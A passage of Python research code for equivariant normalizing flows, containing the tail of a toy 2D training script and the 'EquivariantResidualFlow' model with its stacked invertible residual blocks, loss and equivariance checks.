'Iter {:04d} | Time {:.4f}({:.4f}) | Loss {:.6f}({:.6f})'
' | Logp(z) {:.6f}({:.6f}) | DeltaLogp {:.6f}({:.6f})'.format(
i+1, time_meter.val, time_meter.avg, loss_meter.val, loss_meter.avg, logpz_meter.val, logpz_meter.avg,
delta_logp_meter.val, delta_logp_meter.avg
)
)
if (i + 1) % args.test_interval == 0 or i == args.num_iters:
test(args, i, flow, whole_data, test_data_iter, prior)
# ipdb.set_trace()
if (i + 1) % args.log_interval == 0 and args.plot:
print("Log Likelihood at %d is %f" %(i+1, loss))
flow.update_lipschitz(200)
with torch.no_grad():
flow.eval()
p_samples = sample_2d_data(args.dataset, 400)
# sample_fn, density_fn = flow.flow_model.inverse, flow.flow_model.forward
sample_fn, density_fn = None, flow.flow_model.forward
plt.figure(figsize=(9, 3))
visualize_transform(
p_samples, torch.randn, flow.standard_normal_logprob, transform=sample_fn, inverse_transform=density_fn,
samples=True, npts=100, device=args.dev
)
plt.savefig('figures/E_figures/{}_{}.png'.format(args.plot_name, str(i+1)))
plt.close()
flow.train()
end = time.time()
def main(args):
# args.input_size = (args.batch_size, 1, 1, args.input_dim)
args.input_size = (args.batch_size, args.nc, 1, args.input_dim)
flow = create_flow(args, args.model_type)
print("Number of trainable parameters: {}".format(count_parameters(flow)))
# optimizer = optim.Adam(flow.parameters(), lr=args.lr, weight_decay=args.weight_decay)
optimizer = optim.AdamW(flow.parameters(), lr=args.lr, amsgrad=True, weight_decay=args.weight_decay)
train_flow(args, flow, optimizer)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
# boiler plate inits
parser.add_argument('--plot', action='store_true', help='Plot a flow and target density.')
parser.add_argument('--cuda', type=int, help='Which GPU to run on.')
parser.add_argument('--seed', type=int, default=0, help='Random seed.')
parser.add_argument('--num_iters', type=int, default=500)
parser.add_argument('--plot_name', type=str, default='test')
# target density
parser.add_argument('--model_type', type=str, default="Toy", help='Which Flow to use.')
parser.add_argument('--dataset', type=str, default=None, help='Which potential function to approximate.')
# parser.add_argument('--nsamples', type=int, default=500, help='Number of Samples to Use')
# model parameters
parser.add_argument('--input_size', type=int, default=2, help='Dimension of the data.')
parser.add_argument('--input_dim', type=int, default=2, help='Dimension of the data.')
parser.add_argument('--nc', type=int, default=1, help='Num channels.')
parser.add_argument('--hidden_dim', type=int, default=32, help='Dimensions of hidden layers.')
parser.add_argument('--num_layers', type=int, default=1, help='Number of hidden layers.')
parser.add_argument('--n_blocks', type=str, default='1')
# i-Resnet params
parser.add_argument('--coeff', type=float, default=0.9)
parser.add_argument('--vnorms', type=str, default='222222')
parser.add_argument('--n-lipschitz-iters', type=int, default=100)
parser.add_argument('--atol', type=float, default=None)
parser.add_argument('--rtol', type=float, default=None)
parser.add_argument('--learn-p', type=eval, choices=[True, False], default=False)
parser.add_argument('--mixed', type=eval, choices=[True, False], default=True)
parser.add_argument('--mean-free-prior', type=eval, choices=[True, False], default=False)
parser.add_argument('--beta', type=float, default=1.0)
parser.add_argument('--dims', type=str, default='128-128-128-128')
parser.add_argument('--act', type=str, default='swish')
parser.add_argument('--group', type=str, default='fliprot4', help='The choice of group representation for Equivariance')
parser.add_argument('--out-fiber', type=str, default='regular')
parser.add_argument('--field-type', type=int, default=0, help='Only For Continuous groups. Picks the frequency.')
parser.add_argument('--kernel_size', type=int, default=3)
parser.add_argument('--realnvp-padding', type=int, default=1)
parser.add_argument('--brute-force', type=eval, choices=[True, False], default=False)
parser.add_argument('--actnorm', type=eval, choices=[True, False], default=False)
parser.add_argument('--batchnorm', type=eval, choices=[True, False], default=False)
parser.add_argument('--exact-trace', type=eval, choices=[True, False], default=False)
parser.add_argument('--n-power-series', type=int, default=None)
parser.add_argument('--n-dist', choices=['geometric', 'poisson'], default='geometric')
# training parameters
parser.add_argument('--use_whole_data', type=eval, choices=[True, False], default=False)
parser.add_argument('--log_interval', type=int, default=10, help='How often to save model and samples.')
parser.add_argument('--test_interval', type=int, default=500, help='How often to save model and samples.')
parser.add_argument('--batch_size', type=int, default=128)
parser.add_argument('--test_batch_size', type=int, default=10000)
parser.add_argument('--lr', type=float, default=5e-3)
parser.add_argument('--weight-decay', type=float, default=1e-5)
parser.add_argument('--annealing-iters', type=int, default=0)
args = parser.parse_args()
''' Fix Random Seed '''
seed_everything(args.seed)
# Check if settings file
args.dev = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
project_name = project_name(args.dataset)
main(args)
```
#### File: Equivariant-Discrete-Flows/flows/equivariant_resflow.py
```python
import numpy as np
import torch
import torch.nn as nn
import math
from nflows.distributions.normal import StandardNormal
from nflows.distributions.uniform import BoxUniform
from e2cnn import gspaces
from e2cnn import nn as enn
from utils import utils
import flows.layers.base as base_layers
import flows.layers as layers
from flows.flow_utils import *
from torch.distributions.multivariate_normal import MultivariateNormal
from flows.distributions import HypersphericalUniform
import ipdb
ACT_FNS = {
'relu': enn.ReLU,
'elu': enn.ELU,
'gated': enn.GatedNonLinearity1,
'swish': base_layers.GeomSwish,
}
GROUPS = {
'fliprot16': gspaces.FlipRot2dOnR2(N=16),
'fliprot12': gspaces.FlipRot2dOnR2(N=12),
'fliprot8': gspaces.FlipRot2dOnR2(N=8),
'fliprot4': gspaces.FlipRot2dOnR2(N=4),
'fliprot2': gspaces.FlipRot2dOnR2(N=2),
'flip': gspaces.Flip2dOnR2(),
'rot16': gspaces.Rot2dOnR2(N=16),
'rot12': gspaces.Rot2dOnR2(N=12),
'rot8': gspaces.Rot2dOnR2(N=8),
'rot4': gspaces.Rot2dOnR2(N=4),
'rot2': gspaces.Rot2dOnR2(N=2),
'so2': gspaces.Rot2dOnR2(N=-1, maximum_frequency=10),
'o2': gspaces.FlipRot2dOnR2(N=-1, maximum_frequency=10),
}
FIBERS = {
"trivial": trivial_fiber,
"quotient": quotient_fiber,
"regular": regular_fiber,
"irrep": irrep_fiber,
"mixed1": mixed1_fiber,
"mixed2": mixed2_fiber,
}
def standard_normal_logprob(z):
logZ = -0.5 * math.log(2 * math.pi)
return logZ - z.pow(2) / 2
def add_padding(args, x, nvals=256):
# Theoretically, padding should've been added before the add_noise preprocessing.
# nvals takes into account the preprocessing before padding is added.
if args.padding > 0:
if args.padding_dist == 'uniform':
u = x.new_empty(x.shape[0], args.padding, x.shape[2], x.shape[3]).uniform_()
logpu = torch.zeros_like(u).sum([1, 2, 3]).view(-1, 1)
return torch.cat([x, u / nvals], dim=1), logpu
elif args.padding_dist == 'gaussian':
u = x.new_empty(x.shape[0], args.padding, x.shape[2], x.shape[3]).normal_(nvals / 2, nvals / 8)
logpu = normal_logprob(u, nvals / 2, math.log(nvals / 8)).sum([1, 2, 3]).view(-1, 1)
return torch.cat([x, u / nvals], dim=1), logpu
else:
raise ValueError()
else:
return x, torch.zeros(x.shape[0], 1).to(x)
class EquivariantResidualFlow(nn.Module):
def __init__(
self,
args,
input_size,
n_blocks=[16, 16],
intermediate_dim=32,
factor_out=True,
quadratic=False,
init_layer=None,
actnorm=False,
fc_actnorm=False,
batchnorm=False,
dropout=0,
fc=False,
coeff=0.9,
vnorms='122f',
n_lipschitz_iters=None,
sn_atol=None,
sn_rtol=None,
n_power_series=None,#5,
n_dist='geometric',
n_samples=1,
kernels='3-1-3',
activation_fn='elu',
fc_end=False,
fc_idim=128,
n_exact_terms=0,
preact=False,
neumann_grad=True,
grad_in_forward=True,
first_resblock=False,
learn_p=False,
classification=False,
classification_hdim=64,
n_classes=10,
block_type='resblock',
group_action_type=None,
):
super(EquivariantResidualFlow, self).__init__()
self.args = args
self.n_scale = min(len(n_blocks), self._calc_n_scale(input_size))
_, self.c, self.h, self.w = input_size[:]
self.n_blocks = n_blocks
self.intermediate_dim = intermediate_dim
self.factor_out = factor_out
self.quadratic = quadratic
self.init_layer = init_layer
self.actnorm = actnorm
self.fc_actnorm = fc_actnorm
self.batchnorm = batchnorm
self.dropout = dropout
self.fc = fc
self.coeff = coeff
self.vnorms = vnorms
self.n_lipschitz_iters = n_lipschitz_iters
self.sn_atol = sn_atol
self.sn_rtol = sn_rtol
self.n_power_series = n_power_series
self.n_dist = n_dist
self.n_samples = n_samples
self.kernels = kernels
self.fc_end = fc_end
self.fc_idim = fc_idim
self.n_exact_terms = n_exact_terms
self.preact = preact
self.neumann_grad = neumann_grad
self.grad_in_forward = grad_in_forward
self.first_resblock = first_resblock
self.learn_p = learn_p
self.classification = classification
self.classification_hdim = classification_hdim
self.n_classes = n_classes
self.block_type = block_type
if not self.n_scale > 0:
raise ValueError('Could not compute number of scales for input of' 'size (%d,%d,%d,%d)' % input_size)
self.activation_fn = ACT_FNS[activation_fn]
self.group_action_type = GROUPS[args.group]
self.out_fiber = args.out_fiber
self.field_type = args.field_type
self.group_card = len(list(self.group_action_type.testing_elements))
self.input_type = enn.FieldType(self.group_action_type, self.c*[self.group_action_type.trivial_repr])
self.transforms = self._build_net(input_size)
self.dims = [o[1:] for o in self.calc_output_size(input_size)]
self.uniform_prior = BoxUniform(torch.tensor([0.0]).to(args.dev),
torch.tensor([1.0]).to(args.dev))
# self.prior = MultivariateNormal(torch.zeros(2).cuda(),
# torch.eye(2).cuda())
self.prior = HypersphericalUniform(dim=self.c*self.h*self.w,
device=args.dev)
if self.classification:
self.build_multiscale_classifier(input_size)
def _build_net(self, input_size):
_, c, h, w = input_size
transforms = []
_stacked_blocks = StackediResBlocks
in_type = self.input_type
my_i_dims = self.intermediate_dim
out_type = FIBERS[self.out_fiber](self.group_action_type, my_i_dims,
self.field_type, fixparams=True)
for i in range(self.n_scale):
transforms.append(
_stacked_blocks(
in_type,
out_type,
self.group_action_type,
initial_size=(c, h, w),
idim=my_i_dims,
squeeze=False, #Can't change channels/fibers
init_layer=self.init_layer if i == 0 else None,
n_blocks=self.n_blocks[i],
quadratic=self.quadratic,
actnorm=self.actnorm,
fc_actnorm=self.fc_actnorm,
batchnorm=self.batchnorm,
dropout=self.dropout,
fc=self.fc,
coeff=self.coeff,
vnorms=self.vnorms,
n_lipschitz_iters=self.n_lipschitz_iters,
sn_atol=self.sn_atol,
sn_rtol=self.sn_rtol,
n_power_series=self.n_power_series,
n_dist=self.n_dist,
n_samples=self.n_samples,
kernels=self.kernels,
activation_fn=self.activation_fn,
fc_end=self.fc_end,
fc_idim=self.fc_idim,
n_exact_terms=self.n_exact_terms,
preact=self.preact,
neumann_grad=self.neumann_grad,
grad_in_forward=self.grad_in_forward,
first_resblock=self.first_resblock and (i == 0),
learn_p=self.learn_p,
)
)
c, h, w = c * 2 if self.factor_out else c * 4, h // 2, w // 2
print("C: %d H: %d W: %d" %(c, h ,w))
if i == self.n_scale - 1:
out_type = enn.FieldType(self.group_action_type, self.c*[self.group_action_type.trivial_repr])
return nn.ModuleList(transforms)
def _calc_n_scale(self, input_size):
_, _, h, w = input_size
n_scale = 0
while h >= 4 and w >= 4:
n_scale += 1
h = h // 2
w = w // 2
return n_scale
def calc_output_size(self, input_size):
n, c, h, w = input_size
if not self.factor_out:
k = self.n_scale - 1
return [[n, c * 4**k, h // 2**k, w // 2**k]]
output_sizes = []
for i in range(self.n_scale):
if i < self.n_scale - 1:
c *= 2
h //= 2
w //= 2
output_sizes.append((n, c, h, w))
else:
output_sizes.append((n, c, h, w))
return tuple(output_sizes)
def build_multiscale_classifier(self, input_size):
n, c, h, w = input_size
hidden_shapes = []
for i in range(self.n_scale):
if i < self.n_scale - 1:
c *= 2 if self.factor_out else 4
h //= 2
w //= 2
hidden_shapes.append((n, c, h, w))
classification_heads = []
feat_type_out = FIBERS['regular'](self.group_action_type,
self.classification_hdim,
self.field_type, fixparams=True)
feat_type_mid = FIBERS['regular'](self.group_action_type,
int(self.classification_hdim // 2),
self.field_type, fixparams=True)
feat_type_last = FIBERS['regular'](self.group_action_type,
int(self.classification_hdim // 4),
self.field_type, fixparams=True)
# feat_type_out = enn.FieldType(self.group_action_type,
# self.classification_hdim*[self.group_action_type.regular_repr])
for i, hshape in enumerate(hidden_shapes):
classification_heads.append(
nn.Sequential(
enn.R2Conv(self.input_type, feat_type_out, 5, stride=2),
layers.EquivariantActNorm2d(feat_type_out.size),
enn.ReLU(feat_type_out, inplace=True),
enn.PointwiseAvgPoolAntialiased(feat_type_out, sigma=0.66, stride=2),
enn.R2Conv(feat_type_out, feat_type_mid, kernel_size=3),
layers.EquivariantActNorm2d(feat_type_mid.size),
enn.ReLU(feat_type_mid, inplace=True),
enn.PointwiseAvgPoolAntialiased(feat_type_mid, sigma=0.66, stride=1),
enn.R2Conv(feat_type_mid, feat_type_last, kernel_size=3),
layers.EquivariantActNorm2d(feat_type_last.size),
enn.ReLU(feat_type_last, inplace=True),
enn.PointwiseAvgPoolAntialiased(feat_type_last, sigma=0.66, stride=2),
enn.GroupPooling(feat_type_last),
)
)
self.classification_heads = nn.ModuleList(classification_heads)
self.logit_layer = nn.Linear(classification_heads[-1][-1].out_type.size, self.n_classes)
def check_equivariance(self, r2_act, out_type, data, func, data_type=None):
_, c, h, w = data.shape
input_type = enn.FieldType(r2_act, self.c*[r2_act.trivial_repr])
for g in r2_act.testing_elements:
output = func(data)
rg_output = enn.GeometricTensor(output.tensor.view(-1, c, h, w).cpu(),
out_type).transform(g)
data = enn.GeometricTensor(data.tensor.view(-1, c, h, w).cpu(), input_type)
x_transformed = enn.GeometricTensor(data.transform(g).tensor.view(-1, c, h, w).cuda(), input_type)
output_rg = func(x_transformed)
# Equivariance Condition
output_rg = enn.GeometricTensor(output_rg.tensor.cpu(), out_type)
data = enn.GeometricTensor(data.tensor.squeeze().view(-1, c, h , w).cuda(), input_type)
assert torch.allclose(rg_output.tensor.cpu().squeeze(), output_rg.tensor.squeeze(), atol=1e-5), g
print("Passed Equivariance Test")
def check_invariant_log_prob(self, r2_act, out_type, data, data_type=None):
_, c, h, w = data.shape
input_type = enn.FieldType(r2_act, self.c*[r2_act.trivial_repr])
data = enn.GeometricTensor(data.view(-1, c, h, w).cpu(), input_type).to(self.args.dev)
for g in r2_act.testing_elements:
output = self.log_prob(self.args, data.tensor)
data = enn.GeometricTensor(data.tensor.view(-1, c, h, w).cpu(), input_type)
x_transformed = enn.GeometricTensor(data.transform(g).tensor.cpu().view(-1, c, h, w).cuda(), input_type)
output_rg = self.log_prob(self.args, x_transformed.tensor)
# Equivariance Condition
data = enn.GeometricTensor(data.tensor.squeeze().view(-1, c, h , w).cuda(), input_type)
diff = torch.exp(output.squeeze()) - torch.exp(output_rg.squeeze())
avg_norm_diff = torch.norm(diff, p='fro', dim=-1).mean()
print("Avg Norm Diff: %f | G: %d" %(avg_norm_diff, g))
assert torch.allclose(torch.exp(output.squeeze()), torch.exp(output_rg.squeeze()), atol=1e-5), g
print("Passed E-Resflow Invariance Test")
def forward(self, x_in, logpx=None, inverse=False, classify=False):
x = enn.GeometricTensor(x_in.view(-1, self.c, self.h, self.w), self.input_type)
if inverse:
return self.inverse(x, logpx)
out = []
if classify: class_outs = []
for idx in range(len(self.transforms)):
if logpx is not None:
# self.check_equivariance(self.group_action_type, self.input_type,
# x, self.transforms[idx])
x, logpx = self.transforms[idx].forward(x, logpx)
else:
x = self.transforms[idx].forward(x)
if self.factor_out and (idx < len(self.transforms) - 1):
d = x.size(1) // 2
x, f = x[:, :d], x[:, d:]
out.append(f)
# Handle classification.
if classify:
if self.factor_out:
class_outs.append(self.classification_heads[idx](f).tensor)
else:
class_outs.append(self.classification_heads[idx](x).tensor)
out.append(x.tensor.squeeze())
out = torch.cat([o.view(o.size()[0], -1) for o in out], 1)
output = out if logpx is None else (out, logpx)
if classify:
h = torch.cat(class_outs, dim=1).squeeze(-1).squeeze(-1)
logits = self.logit_layer(h)
return output, logits
else:
return output
def inverse(self, z, logpz=None):
if self.factor_out:
z = z.view(z.shape[0], -1)
zs = []
i = 0
for dims in self.dims:
s = np.prod(dims)
zs.append(z[:, i:i + s])
i += s
zs = [_z.view(_z.size()[0], *zsize) for _z, zsize in zip(zs, self.dims)]
if logpz is None:
z_prev = self.transforms[-1].inverse(zs[-1])
for idx in range(len(self.transforms) - 2, -1, -1):
z_prev = torch.cat((z_prev, zs[idx]), dim=1)
z_prev = self.transforms[idx].inverse(z_prev)
return z_prev
else:
z_prev, logpz = self.transforms[-1].inverse(zs[-1], logpz)
for idx in range(len(self.transforms) - 2, -1, -1):
z_prev = torch.cat((z_prev, zs[idx]), dim=1)
z_prev, logpz = self.transforms[idx].inverse(z_prev, logpz)
return z_prev, logpz
else:
# z = z.view(z.shape[0], *self.dims[-1])
for idx in range(len(self.transforms) - 1, -1, -1):
if logpz is None:
z = self.transforms[idx].inverse(z)
else:
z, logpz = self.transforms[idx].inverse(z, logpz)
z = z.tensor.squeeze()
return z if logpz is None else (z, logpz)
def check_invertibility(self, args, x):
if args.dataset == 'celeba_5bit':
nvals = 32
elif args.dataset == 'celebahq':
nvals = 2**args.nbits
else:
nvals = 256
x, logpu = add_padding(args, x, nvals)
z, delta_logp = self.forward(x.view(-1, *args.input_size[1:]), 0)
inv = self.forward(z.view(-1, *args.input_size[1:]), inverse=True)
atol_list = [1e-1, 1e-2, 1e-3, 1e-4, 1e-5]
diff = x - inv
batch_size = x.shape[0]
diff = x.view(batch_size, -1) - inv.view(batch_size, -1)
avg_norm_diff = torch.norm(diff, p='fro', dim=-1).mean()
if avg_norm_diff > 1 or torch.isnan(avg_norm_diff):
ipdb.set_trace()
inv = self.forward(z.view(-1, *args.input_size[1:]), inverse=True)
print("Avg Diff is %f" %(avg_norm_diff))
for atol in atol_list:
res = torch.allclose(x, inv, atol)
print("Invertiblity at %f: %s" %(atol, str(res)))
return avg_norm_diff
def log_prob(self, args, x, beta=1.0):
bits_per_dim, logits_tensor = torch.zeros(1).to(x), torch.zeros(args.n_classes).to(x)
logpz, delta_logp = torch.zeros(1).to(x), torch.zeros(1).to(x)
if args.dataset == 'celeba_5bit':
nvals = 32
elif args.dataset == 'celebahq':
nvals = 2**args.nbits
else:
nvals = 256
x, logpu = add_padding(args, x, nvals)
if args.squeeze_first:
x = squeeze_layer(x)
z, delta_logp = self.forward(x.view(-1, *args.input_size[1:]), 0)
# log p(z)
# logpz = standard_normal_logprob(z).view(z.size(0), -1).sum(1, keepdim=True)
# log p(x)
logpx = logpz - beta * delta_logp - np.log(nvals) * (
args.imagesize * args.imagesize * (args.im_dim + args.padding)
) - logpu
return logpx
def compute_avg_test_loss(self, args, r2_act, data, beta=1.):
_, c, h, w = data.shape
input_type = enn.FieldType(r2_act, self.c*[r2_act.trivial_repr])
bits_per_dim, logits_tensor = torch.zeros(1).to(data), torch.zeros(args.n_classes).to(data)
logpz, delta_logp = torch.zeros(1).to(data), torch.zeros(1).to(data)
logpx_list = []
data = enn.GeometricTensor(data.cpu(), self.input_type)
if args.dataset == 'celeba_5bit':
nvals = 32
elif args.dataset == 'celebahq':
nvals = 2**args.nbits
else:
nvals = 256
for g in r2_act.testing_elements:
x_transformed = data.transform(g).tensor.view(-1, c, h, w).cuda()
padded_inputs, logpu = add_padding(args, x_transformed, nvals)
z, delta_logp = self.forward(padded_inputs.view(-1, *args.input_size[1:]), 0)
logpz = self.prior.log_prob(z).view(z.size(0), -1).sum(1, keepdim=True)
# logpz = standard_normal_logprob(z).view(z.size(0), -1).sum(1, keepdim=True)
# log p(x)
logpx = logpz - beta * delta_logp - np.log(nvals) * (
args.imagesize * args.imagesize * (args.im_dim + args.padding)
) - logpu
logpx_list.append(logpx)
logpx_total = torch.vstack(logpx_list)
bits_per_dim = -torch.mean(logpx_total) / (args.imagesize *
args.imagesize * args.im_dim) / np.log(2)
return bits_per_dim
def compute_loss(self, args, x, beta=1.0, do_test=False):
if do_test:
# ipdb.set_trace()
return self.compute_avg_test_loss(args, self.group_action_type, x)
bits_per_dim, logits_tensor = torch.zeros(1).to(x), torch.zeros(args.n_classes).to(x)
logpz, delta_logp = torch.zeros(1).to(x), torch.zeros(1).to(x)
# ipdb.set_trace()
if args.dataset == 'celeba_5bit':
nvals = 32
elif args.dataset == 'celebahq':
nvals = 2**args.nbits
else:
nvals = 256
x, logpu = add_padding(args, x, nvals)
if args.squeeze_first:
x = squeeze_layer(x)
if args.task == 'hybrid':
z_logp, logits_tensor = self.forward(x.view(-1, *args.input_size[1:]), 0, classify=True)
z, delta_logp = z_logp
elif args.task == 'density':
z, delta_logp = self.forward(x.view(-1, *args.input_size[1:]), 0)
elif args.task == 'classification':
z, logits_tensor = self.forward(x.view(-1, *args.input_size[1:]), classify=True)
if args.task in ['density', 'hybrid']:
# log p(z)
# z = torch.clip(z, -1e-8, 1. + 1e-8)
# logpz = self.uniform_prior.log_prob(z).sum(1, keepdim=True)
# ipdb.set_trace()
# logpz = self.prior.log_prob(z).view(z.size(0), -1).sum(1, keepdim=True)
logpz = standard_normal_logprob(z).view(z.size(0), -1).sum(1, keepdim=True)
# log p(x)
logpx = logpz - beta * delta_logp - np.log(nvals) * (
args.imagesize * args.imagesize * (args.im_dim + args.padding)
) - logpu
bits_per_dim = -torch.mean(logpx) / (args.imagesize *
args.imagesize * args.im_dim) / np.log(2)
logpz = torch.mean(logpz).detach()
delta_logp = torch.mean(-delta_logp).detach()
return bits_per_dim, logits_tensor, logpz, delta_logp, z
def update_lipschitz(self, n_iterations=5):
with torch.no_grad():
for m in self.modules():
# if isinstance(m, base_layers.SpectralNormConv2d) or isinstance(m, base_layers.SpectralNormLinear):
# m.compute_weight(update=True)
if isinstance(m, base_layers.InducedNormEquivarConv2d) or isinstance(m, base_layers.InducedNormLinear):
m.compute_weight(update=True, n_iterations=n_iterations)
def get_svd_constants(self):
lipschitz_constants = []
for m in self.modules():
if isinstance(m, layers.base.r2_conv.MyR2Conv):
lipschitz_constants.append(m.compute_svd())
return lipschitz_constants
def get_lipschitz_constants(self):
lipschitz_constants = []
for m in self.modules():
if isinstance(m, base_layers.SpectralNormConv2d) or isinstance(m, base_layers.SpectralNormLinear):
lipschitz_constants.append(m.scale)
if isinstance(m, base_layers.InducedNormEquivarConv2d) or isinstance(m, base_layers.InducedNormLinear):
lipschitz_constants.append(m.scale)
if isinstance(m, base_layers.LopConv2d) or isinstance(m, base_layers.LopLinear):
lipschitz_constants.append(m.scale)
if isinstance(m, layers.base.r2_conv.MyR2Conv):
lipschitz_constants.append(m.scale)
return lipschitz_constants
def compute_p_grads(self):
scales = 0.
nlayers = 0
for m in self.modules():
if isinstance(m, base_layers.InducedNormConv2d) or isinstance(m, base_layers.InducedNormLinear):
scales = scales + m.compute_one_iter()
nlayers += 1
scales.mul(1 / nlayers).backward()
for m in self.modules():
if isinstance(m, base_layers.InducedNormConv2d) or isinstance(m, base_layers.InducedNormLinear):
if m.domain.grad is not None and torch.isnan(m.domain.grad):
m.domain.grad = None
class StackediResBlocks(layers.SequentialFlow):
def __init__(
self,
in_type,
out_type,
group_action_type,
initial_size,
idim,
squeeze=True,
init_layer=None,
n_blocks=1,
quadratic=False,
actnorm=False,
fc_actnorm=False,
batchnorm=False,
dropout=0,
fc=False,
coeff=0.9,
vnorms='122f',
n_lipschitz_iters=None,
sn_atol=None,
sn_rtol=None,
n_power_series=5,
n_dist='geometric',
n_samples=1,
kernels='3-1-3',
activation_fn='elu',
fc_end=False,
fc_nblocks=4,
fc_idim=128,
n_exact_terms=0,
preact=False,
neumann_grad=True,
grad_in_forward=True,
first_resblock=False,
learn_p=False,
):
chain = []
# Parse vnorms
ps = []
for p in vnorms:
if p == 'f':
ps.append(float('inf'))
else:
ps.append(float(p))
domains, codomains = ps[:-1], ps[1:]
assert len(domains) == len(kernels.split('-'))
def _actnorm(size, fc):
if fc:
return FCWrapper(layers.EquivariantActNorm1d(size[0] * size[1] * size[2]))
else:
return layers.EquivariantActNorm2d(size)
# return layers.EquivariantActNorm2d(size[0]*size[1]*size[2])
def _quadratic_layer(initial_size, fc):
if fc:
c, h, w = initial_size
dim = c * h * w
return FCWrapper(layers.InvertibleLinear(dim))
else:
return layers.InvertibleConv2d(initial_size[0])
def _lipschitz_layer():
return base_layers.get_equivar_conv2d
def _resblock(initial_size, fc, idim=idim, first_resblock=False,
last_fc_block=False):
if fc:
return layers.Equivar_iResBlock(
FCNet(
in_type,
out_type,
group_action_type,
input_shape=initial_size,
idim=idim,
lipschitz_layer=_lipschitz_layer(),
nhidden=len(kernels.split('-')) - 1,
coeff=coeff,
domains=domains,
codomains=codomains,
n_iterations=n_lipschitz_iters,
activation_fn=activation_fn,
preact=preact,
dropout=dropout,
sn_atol=sn_atol,
sn_rtol=sn_rtol,
learn_p=learn_p,
last_fc_block=last_fc_block,
),
n_power_series=n_power_series,
n_dist=n_dist,
n_samples=n_samples,
n_exact_terms=n_exact_terms,
neumann_grad=neumann_grad,
grad_in_forward=grad_in_forward,
)
else:
ks = list(map(int, kernels.split('-')))
if learn_p:
_domains = [nn.Parameter(torch.tensor(0.)) for _ in range(len(ks))]
_codomains = _domains[1:] + [_domains[0]]
else:
_domains = domains
_codomains = codomains
nnet = []
if not first_resblock and preact:
if batchnorm: nnet.append(layers.MovingBatchNorm2d(initial_size[0]))
# nnet.append(activation_fn(in_type, inplace=True))
nnet.append(
_lipschitz_layer()(
in_type, out_type, group_action_type,
ks[0], 1, ks[0] // 2, coeff=coeff, n_iterations=n_lipschitz_iters,
domain=_domains[0], codomain=_codomains[0], atol=sn_atol, rtol=sn_rtol
)
)
if batchnorm: nnet.append(layers.MovingBatchNorm2d(idim))
# nnet.append(activation_fn(True))
nnet.append(activation_fn(nnet[-1].out_type, inplace=True))
for i, k in enumerate(ks[1:-1]):
nnet.append(
_lipschitz_layer()(
nnet[-1].out_type, out_type, group_action_type,
k, 1, k // 2, coeff=coeff, n_iterations=n_lipschitz_iters,
domain=_domains[i + 1], codomain=_codomains[i + 1], atol=sn_atol, rtol=sn_rtol
)
)
if batchnorm: nnet.append(layers.MovingBatchNorm2d(idim))
nnet.append(activation_fn(nnet[-1].out_type, inplace=True))
# nnet.append(activation_fn(True))
if dropout: nnet.append(nn.Dropout2d(dropout, inplace=True))
nnet.append(
_lipschitz_layer()(
nnet[-1].out_type, in_type, group_action_type,
ks[-1], 1, ks[-1] // 2, coeff=coeff, n_iterations=n_lipschitz_iters,
domain=_domains[-1], codomain=_codomains[-1], atol=sn_atol, rtol=sn_rtol
)
)
if batchnorm: nnet.append(layers.MovingBatchNorm2d(initial_size[0]))
return layers.Equivar_iResBlock(
nn.Sequential(*nnet),
n_power_series=n_power_series,
n_dist=n_dist,
n_samples=n_samples,
n_exact_terms=n_exact_terms,
neumann_grad=neumann_grad,
grad_in_forward=grad_in_forward,
)
if init_layer is not None: chain.append(init_layer)
if first_resblock and actnorm: chain.append(_actnorm(initial_size[0], fc))
if first_resblock and fc_actnorm: chain.append(_actnorm(initial_size, True))
if squeeze:
c, h, w = initial_size
for i in range(n_blocks):
if quadratic: chain.append(_quadratic_layer(initial_size, fc))
chain.append(_resblock(initial_size, fc, first_resblock=first_resblock and (i == 0)))
act_norm_size = len(chain[-1].nnet[-1].out_type)
if actnorm: chain.append(_actnorm(act_norm_size, fc))
if fc_actnorm: chain.append(_actnorm(act_norm_size, True))
chain.append(layers.EquivariantSqueezeLayer(2))
else:
for _ in range(n_blocks):
if quadratic: chain.append(_quadratic_layer(initial_size, fc))
chain.append(_resblock(initial_size, fc))
act_norm_size = len(chain[-1].nnet[-1].out_type)
if actnorm: chain.append(_actnorm(act_norm_size, fc))
if fc_actnorm: chain.append(_actnorm(act_norm_size, True))
# Use four fully connected layers at the end.
if fc_end:
for _ in range(fc_nblocks):
if _ == fc_nblocks:
chain.append(_resblock(initial_size, True, fc_idim,
last_fc_block=True))
else:
chain.append(_resblock(initial_size, True, fc_idim))
act_norm_size = len(chain[-1].nnet[-1].out_type)
if actnorm or fc_actnorm: chain.append(_actnorm(act_norm_size, True))
super(StackediResBlocks, self).__init__(chain)
class FCNet(nn.Module):
def __init__(self, in_type, out_type, group_action_type, input_shape,
idim, lipschitz_layer, nhidden, coeff, domains, codomains,
n_iterations, activation_fn, preact, dropout, sn_atol,
sn_rtol, learn_p, last_fc_block=False, div_in=1):
super(FCNet, self).__init__()
self.input_shape = input_shape
c, h, w = self.input_shape
dim = c * h * w
nnet = []
last_type = in_type
if preact: nnet.append(activation_fn(in_type, True))
if learn_p:
domains = [nn.Parameter(torch.tensor(0.)) for _ in range(len(domains))]
codomains = domains[1:] + [domains[0]]
for i in range(nhidden):
nnet.append(lipschitz_layer(last_type, out_type, group_action_type,
kernel_size=3, stride=1, padding=1,
coeff=coeff, n_iterations=n_iterations,
domain=domains[i],
codomain=codomains[i], atol=sn_atol,
rtol=sn_rtol))
nnet.append(activation_fn(nnet[-1].out_type, inplace=True))
last_type = nnet[-1].out_type
if dropout: nnet.append(nn.Dropout(dropout, inplace=True))
nnet.append(lipschitz_layer(last_type, in_type, group_action_type,
kernel_size=3, stride=1, padding=1,
coeff=coeff, n_iterations=n_iterations,
domain=domains[-1], codomain=codomains[-1],
atol=sn_atol, rtol=sn_rtol))
if not last_fc_block:
nnet.append(activation_fn(nnet[-1].out_type, inplace=True))
self.nnet = nn.Sequential(*nnet)
def forward(self, x):
return self.nnet(x)
class FCWrapper(nn.Module):
def __init__(self, fc_module):
super(FCWrapper, self).__init__()
self.fc_module = fc_module
def forward(self, x, logpx=None):
shape = x.shape
x = x.view(x.shape[0], -1)
if logpx is None:
y = self.fc_module(x)
return y.view(*shape)
else:
y, logpy = self.fc_module(x, logpx)
return y.view(*shape), logpy
def inverse(self, y, logpy=None):
shape = y.shape
y = y.view(y.shape[0], -1)
if logpy is None:
x = self.fc_module.inverse(y)
return x.view(*shape)
else:
x, logpx = self.fc_module.inverse(y, logpy)
return x.view(*shape), logpx
```
#### File: Equivariant-Discrete-Flows/flows/flows.py
```python
import torch
import torch.nn as nn
import numpy as np
